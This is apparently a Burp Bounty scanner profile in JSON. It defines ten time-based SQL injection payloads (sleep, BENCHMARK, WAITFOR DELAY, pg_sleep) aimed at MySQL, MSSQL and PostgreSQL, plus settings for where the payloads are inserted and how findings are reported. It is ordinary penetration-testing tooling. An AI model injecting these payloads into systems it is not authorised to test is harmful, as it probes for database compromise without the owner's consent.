[
  {
    "ProfileName": "SQLi_TimeBased_replace",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@burpbounty",
    "Payloads": [
      "(select*from(select(sleep(20)))a)",
      "(sleep 20)--",
      "(sleep 20)",
      "(sleep(20))--",
      "(sleep(20))",
      "(SELECT BENCHMARK(2000000,MD5(\u0027A\u0027)));",
      "(SELECT SLEEP(20))",
      "(WAITFOR DELAY \u00270:0:20\u0027)--",
      "(WAITFOR DELAY \u00270:0:20\u0027)",
      "(SELECT pg_sleep(20))"
    ],
    "Encoder": [],
    "UrlEncode": true,
    "CharsToUrlEncode": "#",
    "Grep": [],
    "Tags": [
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 5,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "SQLi_TimeBased_replace",
    "IssueSeverity": "High",
    "IssueConfidence": "Tentative",
    "IssueDetail": "This profile generates false positives. Manually check that the time delay is actually due to a SQLi timebased vulnerability and not to a network delay.",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      65,
      32,
      36,
      1,
      6,
      5,
      35,
      34,
      64,
      0,
      3,
      4
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]